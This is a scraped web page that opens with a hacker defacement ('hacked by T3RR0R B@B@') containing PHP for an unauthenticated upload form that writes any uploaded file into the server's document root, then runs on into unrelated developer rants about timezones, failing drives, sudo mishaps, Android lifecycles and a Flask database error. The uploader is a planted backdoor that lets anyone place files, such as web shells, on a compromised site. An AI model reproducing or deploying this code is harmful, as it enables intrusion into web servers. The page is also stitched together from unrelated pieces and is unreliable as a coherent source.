margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}
.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>
<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>
<!DOCTYPE html>
<html>
<title>K.I.T.A</title>
<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">
<embed src="https://youtube.com/v/tec_KllmOH4/...
<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>11 -
Spend literally two days trying to figure out why I have a 2 hour offset in my timezones for a lamp web app. This isn't even close to my first timezone rodeo.
Check logs, reset Apache/MySQL/PHP timezones in like 100 places. Use 3rd party server side and client side timezone libraries. Moment.js you say? Shit works like a charm... but is, of course, still two hours off.
MySQL is right. PHP is right. Apache is right. PHP libs are in place. Finally convert the entire damn project to use epoch time because I have a deadline, I have no more time to read backwater AWS docs and try to figure out why the hell this Ubuntu EC2 is fucked up, and I literally cannot figure out why in the hell the damn clock is off.
Several days later notice a variable in the main .config file... right in root... 2 hour timezone offset.
Fuuuuuuuuuuuuuuuuuuuuck.8 -
The ridiculous and shameful story of how simply "installing Windows" saved my hard drive from the garbage.
(Also update on https://devrant.com/rants/3105365/)
It started with my root partition turning read-only all of a sudden. Some quick search suggested that I should check the sanity of my hard drive, by running a SMART test, which failed of course. I backed up my data using ddrescue and ran a badblocks over the whole thing, which found around 800 unreadable blocks in a row. I was ready to bid farewell to my drive, but as a last resort, instead of the trash, I brought it to this place where they claimed they can repair the damaged hard drives by "surgery".
To my surprise, they returned my drive the next week, saying it is all well now, and charged me 1/8 the price of a new drive, with a refund guarantee if there was a problem in two days. There was a problem right there: I ran another SMART test which failed again, and also the faulty blocks were still unreadable! So I stormed the place and called for my refund, showing the failed SMART report. The only answer I would get from the staff was "Have you tried installing Windows?".
I usually try to be patient in such situations; I really don't like to declare publicly that "not everyone uses that stinky piece of rotten software you call an OS", but their suggestion seemed totally irrelevant! I got all types of IO errors all over the damn thing and they told me to install Windows. Why? Because this was the only test they would rely on. At last I managed to meet the "technician" there and showed him the IO errors: tried to read the bad sectors with dd and failed. He first mumbled somethings like "Have you checked the connector?" or "Are these the same blocks?", but after he ran out of bullshit, he said "Why don't you just install Windows first and see if that helps?" and I was ready to explode in his face!
"You test drives by installing Windows, just because it will make a nasty NTFS partition and probably does an fsck? If you shut your mouth for a sec and open your eyes you'll see this is a shit load of IO errors we got here: You can't install Windows, you can't even make an NTFS here, because it will try to zero-the-fuck-out the damn partition and it will face the same fucking IO error that I'm showing you right now in almost one single fucking system call!"
"I don't know this kind of test you are using. We have our own tests and they've passed successfully. So all I can do is to give you a Windows CD if you want."
"I don't need a Windows CD. I will just try to make an NTFS partition on the error spot and I will fail."
"Ok. Then call me when your done."
I was angry, not only because I felt they're just trying to avoid a refund, but also because I knew I've lost my drive. But just with hope that I could get my money back, I made a small partition over the error spot and ran `mkfs.ntfs` on it. I was ready to show the failure to the guy, but I looked more precisely and saw that "the filesystem was created successfully!" I was sure something is nor write. I then successfully mounted the new partition, write over it and read it again. I even dd'ed the blocks again, and this time there was no IO error. All of a sudden everything was fine.
I didn't know what happened. Maybe it just needed a write, while I'd just tried to read from those blocks. But anyway, I didn't called the technician guy again. I just thanked one of the staff there and said that my problem was solved. I then ran a successful SMART test and then restored my backup. Ridiculous like that.
I'm still not sure if my drive will continue to live with no more problems. I also have no explanation for what happened. (I appreciate any help on this https://superuser.com/questions/...) But I really like to see the look on the poor guy's face when he finds out that trying to install Windows just saved my ass!11 -
Just remembered that I still had a foobar invite link in my email inbox 😋
The challenges are odd though, first challenge was super easy (basically an idiot check), but while I was able to convert 3 cans of energy drink into a functional solution in half an hour, the verification utility is not very verbose at all. So in Python 3.7.3 in my Debian box it worked just fine, yet the testing suite in Foobar was failing the whole time. After sending an email to my friend that gave the link (several years ago now, sorry about that! 😅) asking if he knew the problem, I found out that Google is still using Python 2.7.13 for some reason. Even Debian's Python is newer, at 2.7.16. To be fair it does still default to Python 2 too. But why.. why on Earth would you use Python 2.7 in a developer oriented set of challenges from a massive company, in 2020 when Python 2 has already been dead for almost a whole year?
But hey now that it's clear that it's Python 2.7, at least the next challenges should be a bit easier. Kind of my first time developing in SnekLang regardless actually, while the language doesn't have everything I'd expect (such as integer square root, at least not in Debian or the foobar challenge's interpreter), its math expressions are a lot cleaner than bash's (either expr or bc). So far I kinda like the language. 2-headed snake though and there's so much garbage for this language online, a lot more than there is for bash. I hate that. Half the stuff flat out doesn't work because it was written by someone who requires assistance to breathe.
Meh, here's to hoping that the next challenges will be smooth sailing :) after all most of the time spent on the first one (17.5 hours) was bottling up a solution for half an hour, tearing my hair out for a few hours on why Google's bloody verification tool wouldn't accept my functioning code (I wrote it for Python 3, assuming that that's what Google would be using), and 10 hours of sleep because no Google, I'm not scrubbing toilets for 48 hours. It's fair to warn people but no, I'm not gonna work for you as a cleaning lady! 😅
Other than the issues that the environment has, it's very fun to solve the challenges though. Fuck the theoretical questions with the whiteboard, all hiring processes should be like this!1 -
So here I work with this colleague that , at first , had a reasonable résumé. Whatever.
Time goed by and he is just doing tickets, clicking left and right, the usual grind of a shitty monitoring system which I am working intensely on deprecating that shit. Anyhoo
The last few days it became apparent that his resume was basically a hot air cake and he knows basically nothing intrinsically.
As I have stated before in previous rants, "everyone was a noob once"... But this guy...
He wants to do "something with Ansible"... "Ok what do you want to do?" , I asked (and I regret to have asked).
He basically wants to write new files on targets. Easy enough, I show him how he could do it with playbooks, inventory and role just for demonstrating the entire chain.
This guy chanes everything up, thereby breaking host group assignment, he launchea it on ALL machines...
Luckily it's a harmless file, so dodged a bullet there.
But the real wtf ia that he did it with the root account for our systems, without understanding the difference between "authentication" and "authorization"...
I am now explaining him what the difference is and how he can be able to check it. I give him the commands literally! ( sudo -l -U <user>)
Manages to fucking open up each sudoer file in vim , mistype or whatever he did in an attempt to leave vim... Breaks sudo...
Now he tries to spin it in such a way that I have steered him to break things.
"Dude you just fucking failed a copy/paste and you did absolutely fuckall without understanding what you are doing, then splurge out accusations because you did it wrong!"
FMLrant privilege escalation authentication authorization living eventually gets revealed colleagues without intrinsic knowledge breaking sudo3 -
Hey passwd, when I want my password to be short then I want it fucking short. Don't tell me that "f" is too weak and prevent the action. A mere warning would suffice. (And I now know that if run as root it doesn't check the password criteria. Still, the default is annoying.)
I needed a short password to workaround a weird frozen system issue on unlocking the keyring in the latest Ubuntu release. It would freeze completely while I was typing my password, and hence by making my password short, I was quicker than the freeze, and hence got a useable system again. -
after exploring a lot of ui frameworks and architectures, i am trying to go back to android dev but again with the curiosity for the one single question that i had at the start of my career 5 years back : why is it's ui so complex?
can anyone help me understand it?
like comparing with the most basic ui framework : html/css/js, why android is so different? we got activities, fragments and views. the worst thing in android is lifecycles, that each of these ui components have.
The view lifecycle is simple to get over with : whatever is the lifecycle of its parent, is the lifecycle of view.
a view's parent is another view, whose parent is another view, whose parent is... and so on until we reach the root view which is stored by either a fragment or activity
therefore a view's lifecycle = lifecycle of activity or fragment
till here its very clear. the fuckup is simply in the next part:
WTAF is activity ?WTAF is fragment? why are their various functions called in the sequence they are called? oncreate, on start, onstartview, ondestroy... why?
activity is still somewhat okay, but fragment is completey weird af : it can be a part of activity: basically it can cover your complete screen and behave as an activity itself (so you don't get to say that activity === screen and fragment === view) AND IT HAS ITS OWN FUCKING LIFECYCLES! So does that mean fragment's fucntions cna also be called by OS?
what's more mind fucking, is the fact that android activity can destroy/pause or recreate fragments on its own, by some "views" like viewpager , or even hold multiple fragments as "alive" at the same time, using something called a "backstack" ??!??!
and each of these fragments in the stack can be called by system at any time? like wtf???
all these stuff is super confusing and i haven't even scratched the surface. the newer , more complicated stuff like viewmodel, livedata and again "lifecycles" has a complete seperate behavior and functionality of their own. plus the various "reality-check" scenarios like: when a user is streaming a video in picture-in-picture mode while keeping your app in split screen with maps in the second split, when a call comes and the video keeps running, and user rotates the device, let me know the clusterfuck situation for the 3rd fragment in your 5 icon navigation view currently at the payment page with 2 fragments and 1 activity in backstack!!!
god bless thy soul for this shitty framework isn't going anywhere , rather its super strong and getting more clusterfucked with new beautiful shit everyday.
(if someone can ignore my gentle language, i would really like to know/get redirected to some resources where i can learn more on this)3 -
Rant!!!
Recently, there has been this issue on StackOverflow not been friendly to beginners. I don't fully agree with that. SO is strict and rightly so because if not that, we will be flooded with repeated questions and low value answers. As a programmer, I believe when I go to SO, I want an answer quickly and fast because most at times, I'm programming and the problem I have is preventing me from moving forward. To be flooded by repeated and low quality questions and answers wouldn't help anyone. Also, on most beginner programming tutorials, were people are advised to check sites like SO when they have problems, most of them tell their listeners or readers to check if the question has been asked before, before going ahead to ask. Even SO assists you when typing your question with similar questions just to make sure you don't ask repeated questions. I rarely downvote but I understand those who do. Also, there is this talk about 'inclusivity' and some relating it to gender. It looks like people tend to slap gender and race on everything these days. To make this clear, I'm not a white male so that one wouldn't say the system favors me so I don't see the problem. The fact SO collects data about developers and it comes out that, most of the partakers are males doesn't mean SO is favoring males. SO doesn't show your gender when you ask a question. It doesn't even show your gender in your profile so what's the issue here? It will be better to get to the root of why there are few females in computer engineering and solve it there rather than blaming a site because of data collected. To know where this rant is coming from, just search StackOverflow on twitter and read the recent tweets.6 -
!long rant
Trying to work from home is always a pain, since we need to use company laptops (no ifs, ands or buts about it).
Yesterday I took the laptop in to check for updates that just wouldn't run while at home (my first mistake), and I couldn't get past the "Press Ctrl+Alt+Delete to login" screen, laptop keyboard didn't seem to be registering clicks, and an external keyboard wasn't either (and I forgot about the on-screen keyboard). A couple of restarts later with no further changes to the situation, the laptop then didn't get past the BIOS screen.
So I called support (my second mistake) and logged an incident.
Couple of hours later someone comes to my desk and asks about the issue, so I describe it, show them (by now the laptop was once again getting past BIOS screen), and leave them to it. Since these laptops are just used as preconfigured VPN and RDP gateways, I said it would be okay if he just wanted to reinstall the OS (my third mistake).
Several hours later, after staying late last night waiting for it to finish, I loaded my profile, installed updates, shut down, grabbed my stuff and left, without checking VPN or RDP over WiFi (my fourth mistake).
Turns out that some of the buttons on the keyboard just no longer work, but now USB keyboards do work, and I can just use OSK to login while out. I figured this would be my only issue with things, and that it was acceptable.
This morning I attempt to use the laptop, and forgot about OSK and the faulty delete button, so spent a few minutes on that. Try to connect to WiFi and find it can't connect, because of course, it doesn't remember the WiFi password, so I root around for the code in some drawer, enter it, and it works. VPN tries to connect and... get told to insert my smart card, which is already inserted, because the driver is wrong!
So I'm sitting here writing a post, not quite believing that I'm considering cancelling my plans for the day to go into the office because of a bloody driver issue now...1 -
Is exclusively being assigned bug tickets only for a whole sprint (they're not my bugs) while another dev does feature work a bad sign? I'm a Senior SDE but my domain Knowledge is far weaker than the other SDE 2, so he can get feature work done faster. Bug fixes are general project ones that are either suddenly very critical or lower priority and leads me to keep debugging some other aspect of the system (not much documentation sadly so have to check whole flow slowly to understand it, very financial based).
My manager also just yesterday said as a senior my expectation is to lead a project and we'll discuss the requirements of my role. This is my direct manager, the one who assigned me all the bugs is the project manager, who also acts a bit like an SDE sometimes. The problem is I want to deliver work my main manager suggests but I simply don't get the time due to suddenly high priority bugs occurring (last night 1 hour before I log off, other manager says to find root cause analysis of a high priority bug), this isn't an oncall rota or task either, just normal bugs all the time.
Is this a bad sign? Am I about to be PiPed?9 -
So, we're preforming a re-write an application. It's on an application (actual mortgage application, not 'app') that has 4 different entry points. We have the most common entry point converted to our re-written application with plans to have the next couple done over the next several weeks. Yesterday, the old version broke. It was under the impression that it could grab any row that matched the borrower and then check against a hash of that data to see if it could proceed. It can't. You can't hash data set 1 and expect it to be the same as the hash for data set 2. Not a thing. When asked, the only answer we could give right away was "We'll fix it, give us a couple of minutes" and "Sorry, bad {{appName}} is bad. We don't know root cause yet. We'll let you know when we do." Was pulled aside by my manager and told my answer was unsatisfactory and I shouldn't give answers like that. I get it, "Bad {{appName}} is bad" isn't great, but it's not like we were going to give that and leave it! We needed some time!2
-
I think I finally, really, comprehend why secret societies have historically been created... I mean the potentially logical ones. This train of thought is logically terrifying.
I want a logic check.
I've been jokingly mentioning some of my totally true, practically useless in most scenarios, skills/specific fields of knowledge/ability under a moniker of 'extremely useful, assuming apocalyptic event' for years. Things like advanced knowledge of Coefficients of glass expansion, Fortran, various things that have caused friends to refer to me as MacGyver after the reboot came out.
In recent years, I've personally encountered several varieties of the ones defined by helplessness, self-victimisation, some version of a real disability... that theyve expounded into a personified personal nemesis-- to flashily battle yet never overcome, etc... the vast majority perplexing me as to why that's a valid form of life to them... it's not that they never consider some other way; the ball is just quickly dropped and never picked back up.
College?(not that I'm a big fan) they wish they could but so expensive... aide? The form was hard/confusing/past-due...
Lookup/learn something more indepth than a tiktok? *some self-deprecating bs*
Yet it's "I always wanted to do/be/learn X"
Shows like 'How It's Made' fascinate, but don't inspire enough for a 5min google query.
In the dev world its a clear, inverted pyramid-- one of the first posts I saw when I rejoined here was ostream's rant on Apple sucking because after they stop support/updates you "can't" load a different OS... ofc you can. But several comments down... no mention of that... i think it was @LensFlare who was the only one in ~15 respondents to point out the core logical fallacy.
Basic shit is totally forgotten... try asking some random adults what plastic is made from... or pay attention to how many people declare they have a gluten "allergy".
I get people frequently telling me that things im pointing out as differences don't matter because "it's just semantics"... semantics is literally the epitome of "significance", with roots in 'meaning' and 'truth'
Back to the main issue... We are in a world where DIY is typically something you pay more to do as a catered experience than actually learning anything, people destroy their own arguments hopes of validity unwittingly often by stating the arguement, get 'offended' or 'triggered' by factual statements, propagate misinformation and bastardise words until MW needs money enough to print a new version, likely adding the misuse as an actual definition and basic knowledge and the thought to actually learn is vetoed by the existence of google translate, the wisdom of tiktok and the pure brillance of troubleshooting every random linux issue you have from not knowing basic CLI and thinking linux makes you cool, with chmod 777 because so many other dumbasses on forums keep propagating misinformation. Ask them what 777 means, most have no clue... as they didnt consider googling that one before putting it in a terminal several times.
The number of humans that actually know the basic shit that the infrastructure of the world is built on keeps decreasing... and we aren't even keeping a running tally.
The structure of the internet has the right idea... dns- 13 active master root servers, with multiple redundancies if they start dropping... hell ICANN is like a secret society but publicly known/obfuscated... the modern internet hasnt had a global meltdown... aside from the lack of censorship and global availability changing the social definition of a valid use of braincells to essentially propagating spam as if it's factual and educational.
So many 'devs' so few understanding what a driver is, much less how to write one... irl network techs that don't know what dhcp is or that their equiptment has logs... professionals in deducated fields like Autism research/coping... no clue why it was called "autism", obesity and malnutrition simultaneously existing in the same humans... it's like we need to prepare a subterranean life-supporting vault and stock it like Noah's ark... just including the basic knowledge of things that used to be common/obvious. I've literally had 2 different, early 20s, female, certified medical assistants taking my medical history legitimately ask if not having a uterus made it harder to get pregnant...i wish i was joking.
Any ideas better than a subterranean human vault system? It's not like we can simply store detailed explanations, guides, media... unless we find a way to make them into obfuscated tiktok videos apparently on nonsense or makeup tutorials.11 -
This happened to me sometime back.
I want to try out a WordPress plugin in my local machine before installing on a production server. It is an Ubuntu machine. Downloaded and installed Xampp, then setup WordPress with MySQL. Now tried uploading the plugin zip file, it throws some permission error, asking to fix permissions or use FTP. I thought of just chmod 777 recursively for the WordPress directory to fix this easily.
Ran the command, looks like it is hung. Terminated using Ctrl+C and then ran the same command. Again it is taking much time. It should not take so much time to recursively change the permission of just a WordPress directory. Thought something was wrong. Before I realized the damage is already done.
Looks like I ran the command
sudo chmod -R 777 /
instead of
sudo chmod -R 777 ./
Fuck, I missed a dot in the command and it is changing permissions of everything in my machine. Saw the System monitor, CPU usage spiked to 100%. I can't close or open any program. Force shutdown the machine using the power key. It didn't boot again. Recovery mode didn't help. Looks like there is no easy way to restore back from this damage. Most of the files I need are backed up in the cloud, still, need a few more personal files so that I can format and reinstall Ubuntu. Realised I have Windows in dual booting. Boot into Windows and used some ext4 reader to recover the files, formatted and reinstalled the OS. Took a few hours to get back to my previous setup.
Lesson Learned: Don't use sudo unnecessarily.
Double check the command while executing.
Running a wrong command with root permission can fuckup your entire machine. -
I am not a programmer, but I know a little bit of Python, C# and C++, but mostly basic syntax of latest two. Nevertheless it gives me higher ground, why?
I develop way od thinking which maker my life easier. I Havel intershop in Pharmacy and they print small papers with number which you show to get remaining drugs. Currently is number, 17592 which makes someone to type almost 40k numbers and erase also this amount. I use variable function in Libreoffice Writer and you have to type one number and it autonumber 64 (easily to expand but unnecessary) and save fucktone of time 😃 And this is why I thing that teaching programming is beneficial, because it develops mindset of resolving problems in easier way.
On the other hand in a few hours I wrote program for my girlfriend to draw randomly picture of herbal material (leaf, root, fruit etc) and ask for Latin name of this material, check if is correct and display necessary information. Programming was quick, most of time I prepare data for this software and this feels so fuxkibg awesome that I could use my knowledge to help my girlfriend and make something useful which makes me proud (code looks like blue waffle, but it works 😃). Fucking deadlines, but at least I could finish it 😃 -
That awkward feeling when you try to make an easy to pick up and use UI and fail so horrendously, that even a person otherwise skilled in computer management fails to grasp it...
I'm looking at you Synology and your fancy DSM bullshit that I just spent 2 hours trying to make available on WAN.
I almost gave up... Then realised I can log onto there through SSH, sudo su onto root and check out the webserver configuration (nginx) manually to make heads and tails of how to use it!
God... Its just tuesday, and I already feel like I need a shot of something strong... -
I guess I'll just trouble shoot this controller for an hour or so before I check the file-tree and find out that I'm editing a stale file of the same name in the root instead of the nested file...
-
So for the past two days I had to deal with a problem where I have to do a nested query with sequelize, pretty straight forward reading the documentation, or that was I think. I implemented everything according to the docs but the query stills fails, why ? I had no idea, I double check my implementation, I googled the error, no luck, after a day searching like crazy I talked with the backend lead about this and he help me to realize that the naming convention was changing because sequelize is creating a nested (SELECT * FROM) because one of the relations has a one-to-many realtion with the root model and I'm why the heck is doing that? But we both didn't know, and the problem was solved by just modifying the names, so we let it through, and sent it to QA. The next day I see the task rejected by QA and the reason was after the changes were merged another part of the app was broken, ok np, I'll fix it right away, and oh God I found the error was caused by another query that was including the first query we fix yesterday ! It was a nested query with 3 lvls! And the names became even more complex ( like `model1->model2.colum1`), goddamit, ok, I spent most of the day searching again, nothing, read the specification of the findAll function, nope, tried to put that name in the ON clause as the docs suggested, still an error, shit, then the lead helps me again and creates a literal which can hold that name and voila! Everything is happiness, at least for that moment, but I was still curious about this behavior, so I keep digging on it and I've just found an issue where a great guy posted an option to the findAll method that is not documented in any version of sequelize ! WTF ! And this option was "subQuery" which if you set it to false it won't create that additional (SELECT * FROM) from before, FUUUCK! I can't believe it, I know that all the effort works in my favor because I learn more about sequelize, but FFS I'm still angry because this shit shouldn't happen, you need to update the god damn docs, it's just adding a row and telling the people what it does. Well to end this, after putting that in the query and replacing all the workarounds with the expected syntaxis everything works like charm.1
-
Checking for root is maintaining a false façade of security. By the definition of root it can always be bypassed and we should be designing workflows to discourage logging in from an untrusted device unless you have 2fa.1
-
I'm working on a simple Flask project. But when I try to work with the database I got an error called "No module named MySQLdb". I also got error when I try to install "mysql clint" with this command:-pip install mysqlclient. So I searched for the solution of this problem but every time I find someone told to download "MySQL client" from this website:-
https://lfd.uci.edu/~gohlke/...
But the "MySQL client" file is no longer available on that website.
please help me by giving that file or any other way. You can also check my project from here:-
https://drive.google.com/file/d/...
unfortunately, my operating system is Android 6.0
Here is the code:-
from flask import Flask,render_template, request
from flask_sqlalchemy import SQLAlchemy
app= Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "mysql://localhost/codingthunder/"
db = SQLAlchemy(app)
class Contacts(db.Model):
sno = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), nullable=False)
phone_num = db.Column(db.String(14), nullable=False)
mes = db.Column(db.String(120), nullable=False)
date = db.Column(db.String(12), nullable=False)
email = db.Column(db.String(20), nullable=False)
@app.route("/home")
def home():
return render_template("index.html")
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/contact", methods=['GET','POST'])
def contact():
if(request.method=='POST'):
name=request.form.get('name')
email=request.form.get('email')
phone=request.form.get('phone')
message=request.form.get('message')
entry=Contacts(name=name,phone_num=phone,mes=message, date="2019-09-01 12:06:20", email=email)
db.session.add(entry)
db.session.commit()
return render_template("contact.html")
@app.route("/post")
def post():
return render_template("post.html")
app.run(debug=True)3 -
!rant
Apparently Android Pay released for Canadians some time ago, because it's on the front page of the google play store. I really want to use it cause remembering to carry a card around is tough work, but I'm failing the safetynet check.
My only choice, it seems is to revert to a system where I don't have root. I was thinking of installing lineageos, but I'd be giving up some pretty serious things that I've gotten into with Resurrection Remix.
The fling navbar would be gone, I'd probably be able to deal with that but I just find it a way nicer experience than the traditional android navbar.
I might not be able to use Google Assistant, not sure if Lineage has it
And (worst of all), if I revert to a system without root, I won't be able to use my system-wide dark mode from substratum (I'd also be losing battery optimizing features from greenify, which is just another downside)
Existing Android Pay users, is this worth it?10